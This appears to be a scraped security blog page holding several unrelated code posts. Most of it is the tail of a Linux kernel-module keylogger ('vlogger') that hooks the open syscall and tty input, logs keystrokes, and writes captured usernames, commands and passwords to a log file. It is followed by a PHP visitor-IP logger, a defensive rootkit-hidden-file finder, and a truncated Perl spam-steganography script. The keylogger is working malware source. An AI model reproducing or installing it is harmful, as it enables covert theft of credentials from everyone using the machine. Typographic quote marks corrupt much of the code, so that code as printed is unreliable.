for (i=0; i<tmp->lastpos; i++)
if (tmp->buf[i] == 0x0D) tmp->buf[i] = 0x0A;

if (!cont)
tmp->buf[tmp->lastpos++] = 0x0A;

tmp->buf[tmp->lastpos] = 0;

if (vlogger_mode == VK_DUMBMODE) {
snprintf(logfile, sizeof(logfile)-1, “%s/%s%d”,
LOG_DIR, TTY_NAME(tty),TTY_NUMBER(tty));
BEGIN_ROOT
if (!tmp->status) {
get_time(date_time);
if (task)
snprintf(loginfo, sizeof(loginfo)-1,
“<%s uid=%d %s> %s”, date_time,
task->uid, task->comm, tmp->buf);
else
snprintf(loginfo, sizeof(loginfo)-1,
“<%s> %s”, date_time, tmp->buf);

write_to_file(logfile, loginfo, strlen(loginfo));
} else {
write_to_file(logfile, tmp->buf, tmp->lastpos);
}
END_ROOT

#ifdef DEBUG
if (task)
DPRINT(“%s/%d uid=%d %s: %s”,
TTY_NAME(tty), TTY_NUMBER(tty),
task->uid, task->comm, tmp->buf);
else
DPRINT(“%s”, tmp->buf);
#endif
tmp->status = cont;

} else {

/*
* Logging USER/CMD and PASS in SMART_MODE
*/

BEGIN_ROOT
if (!tmp->pass) {
get_time(date_time);
if (task)
snprintf(loginfo, sizeof(loginfo)-1,
“\n[%s tty=%s/%d uid=%d %s]\n”
“USER/CMD %s”, date_time,
TTY_NAME(tty),TTY_NUMBER(tty),
task->uid, task->comm, tmp->buf);
else
snprintf(loginfo, sizeof(loginfo)-1,
“\n[%s tty=%s/%d]\nUSER/CMD %s”,
date_time, TTY_NAME(tty),
TTY_NUMBER(tty), tmp->buf);

write_to_file(PASS_LOG, loginfo, strlen(loginfo));
} else {
snprintf(loginfo, sizeof(loginfo)-1, “PASS %s”,
tmp->buf);
write_to_file (PASS_LOG, loginfo, strlen(loginfo));
}

END_ROOT

#ifdef DEBUG
if (!tmp->pass)
DPRINT(“USER/CMD %s”, tmp->buf);
else
DPRINT(“PASS %s”, tmp->buf);
#endif
}

if (!cont) tmp->buf[--tmp->lastpos] = 0;
}

#define resetbuf(t)\
{\
t->buf[0] = 0;\
t->lastpos = 0;\
}

#define append_c(t, s, n)\
{\
t->lastpos += n;\
strncat(t->buf, s, n);\
}

static inline void reset_all_buf(void)
{
int i = 0;
for (i=0; i<MAX_TTY_CON + MAX_PTS_CON; i++)
if (ttys[i] != NULL)
resetbuf(ttys[i]);
}

void special_key(struct tlogger *tmp, const unsigned char *cp, int count)
{
switch(count) {
case 2:
switch(cp[1]) {
case ‘\”:
append_c(tmp, “[ALT-\']“, 7);
break;
case ‘,’:
append_c(tmp, “[ALT-,]“, 7);
break;
case ‘-’:
append_c(tmp, “[ALT--]“, 7);
break;
case ‘.’:
append_c(tmp, “[ALT-.]“, 7);
break;
case ‘/’:
append_c(tmp, “[ALT-/]“, 7);
break;
case ’0′:
append_c(tmp, “[ALT-0]“, 7);
break;
case ’1′:
append_c(tmp, “[ALT-1]“, 7);
break;
case ’2′:
append_c(tmp, “[ALT-2]“, 7);
break;
case ’3′:
append_c(tmp, “[ALT-3]“, 7);
break;
case ’4′:
append_c(tmp, “[ALT-4]“, 7);
break;
case ’5′:
append_c(tmp, “[ALT-5]“, 7);
break;
case ’6′:
append_c(tmp, “[ALT-6]“, 7);
break;
case ’7′:
append_c(tmp, “[ALT-7]“, 7);
break;
case ’8′:
append_c(tmp, “[ALT-8]“, 7);
break;
case ’9′:
append_c(tmp, “[ALT-9]“, 7);
break;
case ‘;’:
append_c(tmp, “[ALT-;]“, 7);
break;
case ‘=’:
append_c(tmp, “[ALT-=]“, 7);
break;
case ‘[':
append_c(tmp, "[ALT-[]“, 7);
break;
case ‘\\’:
append_c(tmp, “[ALT-\\]“, 7);
break;
case ‘]’:
append_c(tmp, “[ALT-]]”, 7);
break;
case ‘`’:
append_c(tmp, “[ALT-`]“, 7);
break;
case ‘a’:
append_c(tmp, “[ALT-A]“, 7);
break;
case ‘b’:
append_c(tmp, “[ALT-B]“, 7);
break;
case ‘c’:
append_c(tmp, “[ALT-C]“, 7);
break;
case ‘d’:
append_c(tmp, “[ALT-D]“, 7);
break;
case ‘e’:
append_c(tmp, “[ALT-E]“, 7);
break;
case ‘f’:
append_c(tmp, “[ALT-F]“, 7);
break;
case ‘g’:
append_c(tmp, “[ALT-G]“, 7);
break;
case ‘h’:
append_c(tmp, “[ALT-H]“, 7);
break;
case ‘i’:
append_c(tmp, “[ALT-I]“, 7);
break;
case ‘j’:
append_c(tmp, “[ALT-J]“, 7);
break;
case ‘k’:
append_c(tmp, “[ALT-K]“, 7);
break;
case ‘l’:
append_c(tmp, “[ALT-L]“, 7);
break;
case ‘m’:
append_c(tmp, “[ALT-M]“, 7);
break;
case ‘n’:
append_c(tmp, “[ALT-N]“, 7);
break;
case ‘o’:
append_c(tmp, “[ALT-O]“, 7);
break;
case ‘p’:
append_c(tmp, “[ALT-P]“, 7);
break;
case ‘q’:
append_c(tmp, “[ALT-Q]“, 7);
break;
case ‘r’:
append_c(tmp, “[ALT-R]“, 7);
break;
case ‘s’:
append_c(tmp, “[ALT-S]“, 7);
break;
case ‘t’:
append_c(tmp, “[ALT-T]“, 7);
break;
case ‘u’:
append_c(tmp, “[ALT-U]“, 7);
break;
case ‘v’:
append_c(tmp, “[ALT-V]“, 7);
break;
case ‘x’:
append_c(tmp, “[ALT-X]“, 7);
break;
case ‘y’:
append_c(tmp, “[ALT-Y]“, 7);
break;
case ‘z’:
append_c(tmp, “[ALT-Z]“, 7);
break;
}
break;
case 3:
switch(cp[2]) {
case 68:
// Left: 27 91 68
append_c(tmp, “[LEFT]“, 6);
break;
case 67:
// Right: 27 91 67
append_c(tmp, “[RIGHT]“, 7);
break;
case 65:
// Up: 27 91 65
append_c(tmp, “[UP]“, 4);
break;
case 66:
// Down: 27 91 66
append_c(tmp, “[DOWN]“, 6);
break;
case 80:
// Pause/Break: 27 91 80
append_c(tmp, “[BREAK]“, 7);
break;
}
break;
case 4:
switch(cp[3]) {
case 65:
// F1: 27 91 91 65
append_c(tmp, “[F1]“, 4);
break;
case 66:
// F2: 27 91 91 66
append_c(tmp, “[F2]“, 4);
break;
case 67:
// F3: 27 91 91 67
append_c(tmp, “[F3]“, 4);
break;
case 68:
// F4: 27 91 91 68
append_c(tmp, “[F4]“, 4);
break;
case 69:
// F5: 27 91 91 69
append_c(tmp, “[F5]“, 4);
break;
case 126:
switch(cp[2]) {
case 53:
// PgUp: 27 91 53 126
append_c(tmp, “[PgUP]“, 6);
break;
case 54:
// PgDown: 27 91 54 126
append_c(tmp,
“[PgDOWN]“, 8);
break;
case 49:
// Home: 27 91 49 126
append_c(tmp, “[HOME]“, 6);
break;
case 52:
// End: 27 91 52 126
append_c(tmp, “[END]“, 5);
break;
case 50:
// Insert: 27 91 50 126
append_c(tmp, “[INS]“, 5);
break;
case 51:
// Delete: 27 91 51 126
append_c(tmp, “[DEL]“, 5);
break;
}
break;
}
break;
case 5:
if(cp[2] == 50)
switch(cp[3]) {
case 48:
// F9: 27 91 50 48 126
append_c(tmp, “[F9]“, 4);
break;
case 49:
// F10: 27 91 50 49 126
append_c(tmp, “[F10]“, 5);
break;
case 51:
// F11: 27 91 50 51 126
append_c(tmp, “[F11]“, 5);
break;
case 52:
// F12: 27 91 50 52 126
append_c(tmp, “[F12]“, 5);
break;
case 53:
// Shift-F1: 27 91 50 53 126
append_c(tmp, “[SH-F1]“, 7);
break;
case 54:
// Shift-F2: 27 91 50 54 126
append_c(tmp, “[SH-F2]“, 7);
break;
case 56:
// Shift-F3: 27 91 50 56 126
append_c(tmp, “[SH-F3]“, 7);
break;
case 57:
// Shift-F4: 27 91 50 57 126
append_c(tmp, “[SH-F4]“, 7);
break;
}
else
switch(cp[3]) {
case 55:
// F6: 27 91 49 55 126
append_c(tmp, “[F6]“, 4);
break;
case 56:
// F7: 27 91 49 56 126
append_c(tmp, “[F7]“, 4);
break;
case 57:
// F8: 27 91 49 57 126
append_c(tmp, “[F8]“, 4);
break;
case 49:
// Shift-F5: 27 91 51 49 126
append_c(tmp, “[SH-F5]“, 7);
break;
case 50:
// Shift-F6: 27 91 51 50 126
append_c(tmp, “[SH-F6]“, 7);
break;
case 51:
// Shift-F7: 27 91 51 51 126
append_c(tmp, “[SH-F7]“, 7);
break;
case 52:
// Shift-F8: 27 91 51 52 126
append_c(tmp, “[SH-F8]“, 7);
break;
};
break;
default:// Unknow
break;
}
}

/*
* Called whenever user press a key
*/

void vlogger_process(struct tty_struct *tty,
const unsigned char *cp, int count)
{
struct tlogger *tmp = ttys[TTY_INDEX(tty)];

if (!tmp) {
DPRINT(“erm .. unknow error???\n”);
init_tty(tty, TTY_INDEX(tty));
tmp = ttys[TTY_INDEX(tty)];
if (!tmp)
return;
}

if (vlogger_mode == VK_SMARTMODE) {
if (tmp->status && !IS_PASSWD(tty)) {
resetbuf(tmp);
}
if (!tmp->pass && IS_PASSWD(tty)) {
logging(tty, tmp, 0);
resetbuf(tmp);
}
if (tmp->pass && !IS_PASSWD(tty)) {
if (!tmp->lastpos)
logging(tty, tmp, 0);
resetbuf(tmp);
}
tmp->pass  = IS_PASSWD(tty);
tmp->status = 0;
}

if ((count + tmp->lastpos) > MAX_BUFFER – 1) {
logging(tty, tmp, 1);
resetbuf(tmp);
}

if (count == 1) {
if (cp[0] == VK_TOGLE_CHAR) {
if (!strcmp(tmp->buf, MAGIC_PASS)) {
if(vlogger_mode < 2)
vlogger_mode++;
else
vlogger_mode = 0;
reset_all_buf();

switch(vlogger_mode) {
case VK_DUMBMODE:
DPRINT(“Dumb Mode\n”);
TTY_WRITE(tty, “\r\n”
“Dumb Mode\n”, 12);
break;
case VK_SMARTMODE:
DPRINT(“Smart Mode\n”);
TTY_WRITE(tty, “\r\n”
“Smart Mode\n”, 13);
break;
case VK_NORMAL:
DPRINT(“Normal Mode\n”);
TTY_WRITE(tty, “\r\n”
“Normal Mode\n”, 14);
}
}
}

switch (cp[0]) {
case 0×01://^A
append_c(tmp, “[^A]“, 4);
break;
case 0×02://^B
append_c(tmp, “[^B]“, 4);
break;
case 0×03://^C
append_c(tmp, “[^C]“, 4);
case 0×04://^D
append_c(tmp, “[^D]“, 4);
case 0x0D://^M
case 0x0A:
if (vlogger_mode == VK_SMARTMODE) {
if (IS_PASSWD(tty)) {
logging(tty, tmp, 0);
resetbuf(tmp);
} else
tmp->status = 1;
} else {
logging(tty, tmp, 0);
resetbuf(tmp);
}
break;
case 0×05://^E
append_c(tmp, “[^E]“, 4);
break;
case 0×06://^F
append_c(tmp, “[^F]“, 4);
break;
case 0×07://^G
append_c(tmp, “[^G]“, 4);
break;
case 0×09://TAB – ^I
append_c(tmp, “[TAB]“, 5);
break;
case 0x0b://^K
append_c(tmp, “[^K]“, 4);
break;
case 0x0c://^L
append_c(tmp, “[^L]“, 4);
break;
case 0x0e://^E
append_c(tmp, “[^E]“, 4);
break;
case 0x0f://^O
append_c(tmp, “[^O]“, 4);
break;
case 0×10://^P
append_c(tmp, “[^P]“, 4);
break;
case 0×11://^Q
append_c(tmp, “[^Q]“, 4);
break;
case 0×12://^R
append_c(tmp, “[^R]“, 4);
break;
case 0×13://^S
append_c(tmp, “[^S]“, 4);
break;
case 0×14://^T
append_c(tmp, “[^T]“, 4);
break;
case 0×15://CTRL-U
resetbuf(tmp);
break;
case 0×16://^V
append_c(tmp, “[^V]“, 4);
break;
case 0×17://^W
append_c(tmp, “[^W]“, 4);
break;
case 0×18://^X
append_c(tmp, “[^X]“, 4);
break;
case 0×19://^Y
append_c(tmp, “[^Y]“, 4);
break;
case 0x1a://^Z
append_c(tmp, “[^Z]“, 4);
break;
case 0x1c://^\
append_c(tmp, “[^\\]“, 4);
break;
case 0x1d://^]
append_c(tmp, “[^]]”, 4);
break;
case 0x1e://^^
append_c(tmp, “[^^]“, 4);
break;
case 0x1f://^_
append_c(tmp, “[^_]“, 4);
break;
case BACK_SPACE_CHAR1:
case BACK_SPACE_CHAR2:
if (!tmp->lastpos) break;
if (tmp->buf[tmp->lastpos-1] != ‘]’)
tmp->buf[--tmp->lastpos] = 0;
else {
append_c(tmp, “[^H]“, 4);
}
break;
case ESC_CHAR://ESC
append_c(tmp, “[ESC]“, 5);
break;
default:
tmp->buf[tmp->lastpos++] = cp[0];
tmp->buf[tmp->lastpos] = 0;
}
} else {// a block of chars or special key
if (cp[0] != ESC_CHAR) {
while (count >= MAX_BUFFER) {
append_c(tmp, cp, MAX_BUFFER);
logging(tty, tmp, 1);
resetbuf(tmp);
count -= MAX_BUFFER;
cp += MAX_BUFFER;
}

append_c(tmp, cp, count);
} else // special key
special_key(tmp, cp, count);
}
}

void my_tty_open(void)
{
int fd, i;
char dev_name[80];

#ifdef LOCAL_ONLY
int fl = 0;
struct tty_struct * tty;
struct file * file;
#endif

for (i=1; i<MAX_TTY_CON; i++) {
snprintf(dev_name, sizeof(dev_name)-1, “/dev/tty%d”, i);

BEGIN_KMEM
fd = open(dev_name, O_RDONLY, 0);
if (fd < 0) continue;

#ifdef LOCAL_ONLY
file = fget(fd);
tty = file->private_data;
if (tty != NULL  &&
tty->ldisc.receive_buf != NULL) {
if (!fl) {
old_receive_buf =
tty->ldisc.receive_buf;
fl = 1;
}
init_tty(tty, TTY_INDEX(tty));
}
fput(file);
#endif

close(fd);
END_KMEM
}

#ifndef LOCAL_ONLY
for (i=0; i<MAX_PTS_CON; i++) {
snprintf(dev_name, sizeof(dev_name)-1, “/dev/pts/%d”, i);

BEGIN_KMEM
fd = open(dev_name, O_RDONLY, 0);
if (fd >= 0) close(fd);
END_KMEM
}
#endif

}

void new_receive_buf(struct tty_struct *tty, const unsigned char *cp,
char *fp, int count)
{
if (!tty->real_raw && !tty->raw)// ignore raw mode
vlogger_process(tty, cp, count);
(*old_receive_buf)(tty, cp, fp, count);
}

static inline void init_tty(struct tty_struct *tty, int tty_index)
{
struct tlogger *tmp;

DPRINT(“Init logging for %s%d\n”, TTY_NAME(tty), TTY_NUMBER(tty));

if (ttys[tty_index] == NULL) {
tmp = kmalloc(sizeof(struct tlogger), GFP_KERNEL);
if (!tmp) {
DPRINT(“kmalloc failed!\n”);
return;
}
memset(tmp, 0, sizeof(struct tlogger));
tmp->tty = tty;
tty->ldisc.receive_buf = new_receive_buf;
ttys[tty_index] = tmp;
} else {
tmp = ttys[tty_index];
logging(tty, tmp, 1);
resetbuf(tmp);
tty->ldisc.receive_buf = new_receive_buf;
}
}

asmlinkage int new_sys_open(const char *filename, int flags, int mode)
{
int ret;
static int fl = 0;
struct file * file;

ret = (*original_sys_open)(filename, flags, mode);

if (ret >= 0) {
struct tty_struct * tty;

BEGIN_KMEM
lock_kernel();
file = fget(ret);
tty = file->private_data;

if (tty != NULL &&
((tty->driver.type == TTY_DRIVER_TYPE_CONSOLE &&
TTY_NUMBER(tty) < MAX_TTY_CON – 1 ) ||
(tty->driver.type == TTY_DRIVER_TYPE_PTY &&
tty->driver.subtype == PTY_TYPE_SLAVE &&
TTY_NUMBER(tty) < MAX_PTS_CON)) &&
tty->ldisc.receive_buf != NULL &&
tty->ldisc.receive_buf != new_receive_buf) {

if (!fl) {
old_receive_buf = tty->ldisc.receive_buf;
fl = 1;
}
init_tty(tty, TTY_INDEX(tty));
}
fput(file);
unlock_kernel();
END_KMEM
}
return ret;
}

int init_module(void)
{

DPRINT(MVERSION);
#ifndef LOCAL_ONLY
original_sys_open = sys_call_table[__NR_open];
sys_call_table[__NR_open] = new_sys_open;
#endif
my_tty_open();
//MOD_INC_USE_COUNT;

return 0;
}

DECLARE_WAIT_QUEUE_HEAD(wq);

void cleanup_module(void)
{
int i;

#ifndef LOCAL_ONLY
sys_call_table[__NR_open] = original_sys_open;
#endif

for (i=0; i<MAX_TTY_CON + MAX_PTS_CON; i++) {
if (ttys[i] != NULL) {
ttys[i]->tty->ldisc.receive_buf = old_receive_buf;
}
}
sleep_on_timeout(&wq, HZ);
for (i=0; i<MAX_TTY_CON + MAX_PTS_CON; i++) {
if (ttys[i] != NULL) {
kfree(ttys[i]);
}
}
DPRINT(“Unloaded\n”);
}

EXPORT_NO_SYMBOLS;
<–>

IP Logger

March 3, 2007

#####################
# IP Logger         #
# By b3nx30         #
# 9/4/04            #
# Programming – PHP #
#####################

To log visitors IP’s to your site you must do the following things:

1. Create a file called log.php
2. In the file log.php put this code in and save it:

<?php
$ip = $SERVER['REMOTE_ADDR'];
$fp = fopen(“ip.txt”, “a”);
fputs($fp, “$ip\n”);
fclose($fp);
?>

3. Create a file called ip.txt
4. Upload the files and CHMOD ip.txt to 0666
5. Put this code at the top of the page (above the <html> tag) you want to log visitors IP’s in:

<? include (“log.php”); ?>

To view it simply go to yourwebsite.com/ip.txt

Obviously make sure the page you want it to log the IP address to has to be a PHP page or the
include code will not work!!

FLISTER – uncovering files hidden by Windows rootkits

March 3, 2007

/*
simple proof-of-concept
uncovers files hidden by various rootkits ;)
joanna at invisiblethings.org

http://invisiblethings.org

This is a .CPP FILE
*/

#include <windows.h>
#include <stdio.h>

typedef ULONG NTSTATUS;
typedef struct _IO_STATUS_BLOCK {
union {
NTSTATUS Status;
PVOID Pointer;
};

ULONG_PTR Information;
} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;

typedef
VOID
(NTAPI *PIO_APC_ROUTINE) (
IN PVOID ApcContext,
IN PIO_STATUS_BLOCK IoStatusBlock,
IN ULONG Reserved
);

typedef struct _UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PWSTR  Buffer;
} UNICODE_STRING;

typedef UNICODE_STRING *PUNICODE_STRING;

typedef const UNICODE_STRING *PCUNICODE_STRING;

#define NTAPI __stdcall

#define IN
#define OUT
#define OPTIONAL

typedef enum _FILE_INFORMATION_CLASS {
FileDirectoryInformation = 1,
FileNamesInformation = 12

//…
} FILE_INFORMATION_CLASS, *PFILE_INFORMATION_CLASS;

typedef struct _FILE_DIRECTORY_INFORMATION {
ULONG    NextEntryOffset;
ULONG    Unknown;
LARGE_INTEGER CreationTime;
LARGE_INTEGER LastAccessTime;
LARGE_INTEGER LastWriteTime;
LARGE_INTEGER ChangeTime;
LARGE_INTEGER EndOfFile;
LARGE_INTEGER AllocationSize;
ULONG FileAttributes;
ULONG FileNameLength;
WCHAR FileName[1];
} FILE_DIRECTORY_INFORMATION,
*PFILE_DIRECTORY_INFORMATION;

typedef struct _FILE_NAMES_INFORMATION {
ULONG    NextEntryOffset;
ULONG    Unknown;
ULONG FileNameLength;
WCHAR FileName[1024];
} FILE_NAMES_INFORMATION,
*PFILE_NAMES_INFORMATION;

int ZwQueryDirFileNo = 0;

void usage (char *str) {
printf (“FLISTER 0.1, (c) 2005 by joanna\n”);
printf (“http://invisiblethings.org\n”);
printf (“%s <dir> [ZwQueryDirFile_Syscall_Index]\n”, str);
exit (0);

}

_declspec(naked)
NTSTATUS NTAPI PrivQueryDirectoryFile (
IN HANDLE hFile,
IN HANDLE hEvent OPTIONAL,
IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
IN PVOID AppContext OPTIONAL,
OUT PIO_STATUS_BLOCK pIoStatusBlock,
OUT PVOID FileInfo,
IN ULONG FileInfoLen,
IN FILE_INFORMATION_CLASS FileInfoClass,
IN BOOLEAN ReturnSingleEntry,
IN PUNICODE_STRING FileName OPTIONAL,
IN BOOLEAN RestartScan
) {
_asm {
mov eax, ZwQueryDirFileNo
lea edx, [esp+4]
int 2Eh
ret 2Ch
}
}

typedef NTSTATUS (NTAPI *ZWQUERYDIRFUNC) (
HANDLE,
HANDLE,
PIO_APC_ROUTINE,
PVOID,
PIO_STATUS_BLOCK,
PVOID,
ULONG,
FILE_INFORMATION_CLASS,
BOOLEAN,
PUNICODE_STRING,
BOOLEAN);

ZWQUERYDIRFUNC ZwQueryDirectoryFile;

int main (int argc, char **argv) {
if (argc != 2 && argc != 3) usage(argv[0]);
HANDLE hDir = CreateFile (
argv[1],
FILE_LIST_DIRECTORY,
FILE_SHARE_READ,
NULL,
OPEN_EXISTING,
FILE_FLAG_BACKUP_SEMANTICS,
NULL);

if (hDir == INVALID_HANDLE_VALUE) {
printf (“Can’t open directory\n”);
exit (1);
}

if (argc == 2) {

HMODULE hNTDLL = LoadLibrary (“ntdll”);
ZwQueryDirectoryFile = (ZWQUERYDIRFUNC)
GetProcAddress (hNTDLL, “ZwQueryDirectoryFile”);
printf (“ZwQueryDirFile at addr %#x\n”, (DWORD)ZwQueryDirectoryFile);
//    ZwQueryDirFileNo = *(DWORD*)((char*)addr + 1);
} else {
ZwQueryDirFileNo = strtoul(argv[2], 0, 0);
printf (“Using funtion from SysCallTable[%d]…\n”,
ZwQueryDirFileNo);
ZwQueryDirectoryFile = PrivQueryDirectoryFile;
}

printf (“directory dump:\n———————\n”);

IO_STATUS_BLOCK stat;
FILE_NAMES_INFORMATION fileInfo;

while (1) {

memset (&fileInfo, 0, sizeof (fileInfo));
memset (&stat, 0, sizeof (stat));

NTSTATUS s = ZwQueryDirectoryFile (
hDir,
0,
0,
0,
&stat,
&fileInfo,
sizeof (fileInfo),
FileNamesInformation,
TRUE,
NULL,
FALSE);

if (s == 0×80000006) break;
if (s != 0) {
printf (“error while scanning directory (err = %#x)\n”, s);
exit (2);
}

WCHAR *wfname = new WCHAR [fileInfo.FileNameLength/2 + 1];
memcpy (wfname, fileInfo.FileName, fileInfo.FileNameLength);
wfname [fileInfo.FileNameLength/2] = 0;
printf (“%S\n”, wfname);
delete wfname;

}

CloseHandle (hDir);
return 0;
}

CyberArmy Spam Steganograph

March 3, 2007

#!/usr/local/bin/perl
#
################################
# CyberArmy Spam Steganography #
################################
#
# Mimic.pl:
#
#    This uses steganography to encode a message into spam.  Rather like
# the scripts put up by spammimic.com and others, even if this uses another
# algorithm.  The workings of &encode and &decode are discussed in thier
# comments below, but this is the message format used:
#
#    [GREETING][BEGIN][DATA][END][CLOSING]
#
#    Each spam has a greeting and closing made specifically for that genre
# of spam, whether the spam is credit fraud, phoney cures or MMF.  It also
# picks one of 3 pairs of begin and end lines.  On each line of spam, \n’s are
# replaced with a token [ESC - 33] so they don’t mistakenly get encoded as
# two charactors, while the lines of spam themselves are randomly punctuated by
# &addpunct to add variety.  It also formats the spam into paragraphs of 4-8
# lines so it looks much more natural, while it turns tabs into spaces and also
# specially encodes spaces by doubling the punctuation [eg. '.' -> '..' and so
# on]  In the mean time, each charactor is run through &munge which implements
# a simple series of transliterations to keep repeated lines to a minimum.
#
#
# Credits:
#
#    (c) 2001 Xenographic of the CyberArmy [www.cyberarmy.com]
#    Released under the BSD license for unrestricted free use.
#    This notice is all that must remain unchanged.
#
#    Spammimic.Com
#        They came up with the idea & this is a copy of it.
#
#    News.Admin.Net-Abuse.Sightings [NANAS]
#        I got the spam from there, using groups.google.com.
#
#    O’Reilly Publishing
#        Their books are the best; I also use some boilerplate code from
#        them.
#
#    DAL Net #perl [http://www.dalnet-perl.org]
#        Helped me clean up a few bugs that crept in.
#
#    51 of http://www.cyberarmy.com
#        He suggested some improvements to the coding style.
#

INIT {    # Make sure other INIT blocks see all this.
$corrupt = 0;        # Flag if the data has been corrupted somehow.
$fakeNL = v33;        # Pretend \n is ESC internally.
$tab = ” ” x 5;        # So we can change tabs to spaces.
$verbose = 1;        # Turns on verbose error messages.
$debug_info = “”;    # Holds verbose error messages.
}

&output_header;         # Prints the page’s header.

# Give them a form to enter data if they just got here.
my %data = getDATA() or &ourFORM;
my $input = $data{“MESSAGE”} or &ourFORM(“You forgot to enter a message!”);
$action = $data{“ACTION”};    # Remember for later.

# Decide which action to do.
if ($action eq “DECODE”) {
&decode($input);
} else {
&encode($input);
}

&ourFORM(“You forgot to tell me what to do with that data!”);
exit;    # Explicit.

#################
# output_header #
#################
#
# Outputs the HTML header.
#

sub output_header {

print “Content-type: text/html\n\n”;    # Tell browser what this data is.
$| = 1;                    # Turn off buffering.

print <<’ENDHTML’;

<HTML><HEAD>
<TITLE> Spam Steganography </TITLE>
<STYLE TYPE=”text/css”>
<!–
A:hover   {
color: #C0C0C0;
background: white;
text-decoration:underline;
}
H1, H2, H3 {
margin-left: 0%;
color: #FFAA33;
font-family: arial, verdana, helvetica, sans-serif;
}
–>
</STYLE>
</HEAD>

<BODY BGCOLOR=#263C6D TEXT=”white” LINK=”#FFFFFF” VLINK=”#C0C0C0″ ALINK=”#C0C0C0″>

<H1>Spam Steganography</H1>

This utility is our own rip-off of the
<A href=”http://www.spammimic.com/”>Spam Mimic</A>. It’s improved in
some ways, even if it may sound really idiotic (doesn’t all spam?) and
it doesn’t allow accents.  Don’t put any long messages in there, since
it becomes *VERY* long the more you put into it. Still, it’s one more
thing for email snoops to worry about :] <BR><BR>

-Xenographic <BR><BR>

ENDHTML

}

###########
# getDATA #
###########
#
# Gets the data sent to the script.
#
# Ripped from boilerplate code on p. 81 of O’Reilly’s
# “CGI Programming with Perl.”
#

sub getDATA {

my %form_data;
my $name_value;
my @name_value_pairs = split /&/, $ENV{QUERY_STRING};

if ($ENV{REQUEST_METHOD} eq ‘POST’) {
my $query = “”;
read ( STDIN, $query, $ENV{CONTENT_LENGTH} ) == $ENV{CONTENT_LENGTH}
or return undef;
push @name_value_pairs, split /&/, $query;
}

foreach $name_value (@name_value_pairs) {
my($name, $value) = split /=/, $name_value;

$name =~ tr/+/ /;
$name =~ s/%([\da-f][\da-f])/chr(hex($1))/egi;

$value = “” unless defined $value;
$value =~ tr/+/ /;
$value =~ s/%([\da-f][\da-f])/chr(hex($1))/egi;

$form_data{$name} = $value;
}

return %form_data;
}

###########
# escHTML #
###########
#
# This does a bit more than escapeHTML in cgi.pm would, namely it encodes
# whitespace properly for our uses here.
#

sub escHTML {
my ($info) = @_;    # Get HTML
return undef unless defined($info);

$info =~ s/&/&amp;/g;        # Escape chars into proper HTML.
$info =~ s/</&lt;/g;
$info =~ s/>/&gt;/g;
$info =~ s/\”/&quot;/g;

$info =~ s/\t/$tab/g;        # Change tabs to spaces.
$info =~ s/$fakeNL/<BR>/og;    # Decode hidden \n’s.
$info =~ s/\n/<BR>/g;        # Decode non-hidden \n’s.
1 while $info =~ s/  /&nbsp; /g;# Some spaces cannot be
# &nbsp;’s or it becomes one
# long line.  This allows it
# to show all spaces & work.

return $info;
}

###########
# ourFORM #
###########
#
# Writes out the HTML form used and the footer, as well as any messages. By the
# time you get here, there is no time to do anything else, since you’ll output
# the </HTML> tag.
#

sub ourFORM {

my ($info) = @_;
$info = escHTML($info);

print <<EHTML;

<FORM METHOD=POST>
<TABLE BORDER=0>

<TR VALIGN=TOP>
<TD ALIGN=LEFT>Message:</TD>
</TR>
<TR>
<TD ALIGN=LEFT COLSPAN=3>
<TEXTAREA NAME=”MESSAGE” ROWS=5 COLS=60></TEXTAREA></TD>
</TR>

<TR VALIGN=TOP>
<TD ALIGN=LEFT VALIGN=CENTER>
<INPUT CHECKED TYPE=RADIO NAME=ACTION VALUE=”ENCODE”> Encode </TD>
<TD ALIGN=CENTER VALIGN=CENTER>
<INPUT TYPE=RADIO NAME=ACTION VALUE=”DECODE”> Decode </TD>
<TD ALIGN=RIGHT><INPUT TYPE=SUBMIT VALUE=”Submit”> </TD>
</TR>

</TABLE>
</FORM>

EHTML

unless ($corrupt == 0) { # Print a notice that something went wrong.
print qq!
<B>The program says that some data was lost or incorrect.
Double check it before use.!;
print “<BR> ERROR: $debug_info ” if $verbose;
if ($action eq “DECODE”) {
print qq! <BR>[?'s may indicate corrupted data]!;
}

print qq!</B><BR><BR>!;
}

if ($action eq “ENCODE”) {
# Print the notice that they just encoded something.
print qq!Your message becomes the spam: <BR><BR>!;
}

if ($action eq “DECODE”) {
# Print the notice that they just decoded something.
print qq!The secret message in that spam is: <BR><BR>!;
# Make sure they get *some* feedback.
$info = “[ERROR: NO DATA]” unless defined $info;
}

if (defined $info) {
# Don’t print anything when there’s no message to be given.
print <<”EINFO”;
<TABLE WIDTH=”100%” BORDER=1>
<TR><TD>$info</TD></TR>
</TABLE>
EINFO
}

# Put your page footer in here.
print <<”FOOTER”;
</BODY> </HTML>
FOOTER

exit;    # Done, there’s nothing left to do now…
}

##########
# encode #
##########
#
# Turns a message into spam.  It picks a genre of spam, selects one of the pairs
# of greetings and endings (greetings are 2 lines, the last sentence is only one
# line, that’s why it looks odd below with the 1,3,5 array indexes).  It then
# goes through each charactor & encodes it as a line of spam.  It also puncuates
# each line with a random ! or . [which is why the data section cannot have any
# lines with !'s or .'s in them].  When it encodes a space, it just adds another
# punctuation mark [whichever one it last used, to make it .. for 1 space, ...
# for 2, etc.] Finally, it adds a “pad” to the end appropriate to the genre and
# prints it out for you.  We hide \n’s as ESC [33] internally, since they seem
# to get confused otherwise.
#

sub encode {

my ($message) = @_;     # Get message to encode.
my $badchars = $message; # Save a copy to find the bad chars in it.
$encoded = “”;         # Place to put the message as it’s encoded.

# Replace everything except chars we understand with ?’s.
# Be *very* careful when changing these…
if ($message =~ tr[-^a-zA-Z0-9_ \t\n\r\f\\/:;",.?+~'<>{=}()!@#$%&*][?]c) {

# This had something more…
$corrupt = 1;        # Uh oh, it had bad chars in it.

# Use the same regex as above, w/o the ^ negation and substitue the
# null string instead to be left with what was NOT understood.
$badchars =~ tr[-^a-zA-Z0-9_ \t\n\r\f\\/:;",.?+~'<>{=}()!@#$%&*][]d;

# Remove dupes in $badchars.
$badchars =~ tr[-^a-zA-Z0-9_ \t\n\r\f\\/:;",.?+~'<>{=}()!@#$%&*][]cs;

$badchars = &escHTML($badchars);    # So they show up in HTML.
$debug_info .= ” Found the illegal char(s) [$badchars] when encoding them. ” if $verbose;
}

$message =~ s/\t/$tab/ego;        # Interpret tabs.
$message =~ s/[\r]?\n/$fakeNL/eg;    # Hide \n’s from the encoder.
$message =~ s/\f/$fakeNL/eg;        # Just because… :]

